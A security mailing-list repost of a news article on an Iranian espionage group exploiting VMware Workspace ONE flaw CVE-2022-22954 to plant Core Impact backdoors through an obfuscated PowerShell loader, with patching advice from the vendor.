[BreachExchange] Iranian Hacking Group Among Those Exploiting Recently Disclosed VMWare RCE Flaw

Tue Apr 26 08:48:27 EDT 2022

https://www.darkreading.com/attacks-breaches/-iranian-group-among-those-exploiting-recently-disclosed-rce-flaw-in-vmware

An Iranian cyber espionage group that some vendors track as Rocket Kitten
has begun exploiting a recently patched critical vulnerability in VMWare
Workspace ONE Access/Identity Manager technology to deliver the Core Impact
penetration testing tool on vulnerable systems.

VMWare disclosed the remote code execution vulnerability (CVE-2022-22954)
on April 6, the same time it released a patch for the issue along with
fixes for a total of seven other — somewhat less critical — vulnerabilities
that were privately reported to the company. VMWare identified the RCE
vulnerability as a server-side template injection issue that could be used
for remote code execution. The software vendor assigned it a severity
ranking of 9.8 on a scale of 10 because the flaw, among other things,
allows attackers to gain the highest privileged access in compromised
environments.

Days after the flaw was disclosed, proof-of-exploit code for it became
publicly available on Twitter. Shortly thereafter, threat actors reportedly
began attacking the flaw to install cryptocurrency coin miners on
vulnerable servers.

Among those that began exploiting the flaw on Apr. 14 and 15 were attackers
who used it to gain access to vulnerable networks and launch reverse HTTPS
backdoors such as Core Impact, Cobalt Strike, and Metasploit beacons,
Morphisec said in a report Monday. The tactics, techniques and procedures
of the attackers suggested a link to Rocket Kitten, the security vendor
said.

"Many groups appear to be exploiting this vulnerability, but there are not
many groups deploying stolen Core Impact implants," says Michael Gorelik,
CTO and head of threat research at Morphisec. "The US customer that we saw
targeted here is one that has an outreach to many US customers.
Unfortunately, we can't share any more details on that currently."

Morphisec has approached Core Security to validate the existence of the
watermark within the implant, he says.

The presence of the Core Impact backdoor on the targeted network, he says,
is an indication that an APT group was behind it, simply because of how
rarely the backdoor has been used by others.

Ransomware Risk

Morphisec described the new vulnerability as a server-side template
injection in an Apache Tomcat component of VMWare's Workspace ONE
Access/Identity Manager that allows remote commands to be executed on the
hosting server. The flaw greatly heightens the risk of ransomware attacks
and significant security breaches for organizations using the vulnerable
technology, the security vendor said.

VMWare Workspace ONE Access was previously known as VMWare Identity
Manager. The technology is designed to give enterprises a way to quickly
implement multifactor authentication, single sign-on, and conditional
access policies for workers attempting to access enterprise SaaS, mobile,
and Web application environments. "It is an identity provider and manager,"
Gorelik says. "It has access to all the organizational users and acts as
access control to the environment."

Morphisec said several vulnerabilities have been disclosed in the VMWare
technology recently, including two other RCE flaws, CVE-2022-22958 and
CVE-2022-22957. While both of these flaws are remotely executable, the
attacker would need to have gained administrative access to the vulnerable
server first. However, the new flaw from earlier this month does not
require attackers to have this level of access to exploit it, Morphisec
said.

PowerShell in the Mix

In the attack that Morphisec observed, the attacker — after gaining initial
access to the vulnerable system — deployed a PowerShell stager on it that
in turn downloaded a highly obfuscated PowerShell script called PowerTrash
Loader. The loader then loaded a Core Impact agent in system memory without
leaving a trace of forensic evidence.

Gorelik says Morphisec researchers have previously observed APT groups such
as Russia's FIN7 use PowerTrash Loader to upload remote-access Trojans such
as JSSLoader on target systems in other campaigns.

"The PowerShell command is executed as a direct command sent through
server-side template injection," Gorelik says. "The command is an
obfuscated PowerTrash downloader that eventually deployed the Core Impact
backdoor."

Organizations that implement VMWare's patch for the flaw should be
protected against it, he says. VMWare's advisory noted the flaw is being
actively exploited and pointed to workarounds for mitigating the threat for
organizations that are not able to immediately patch against it.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.riskbasedsecurity.com/pipermail/breachexchange/attachments/20220426/caff1a52/attachment.html>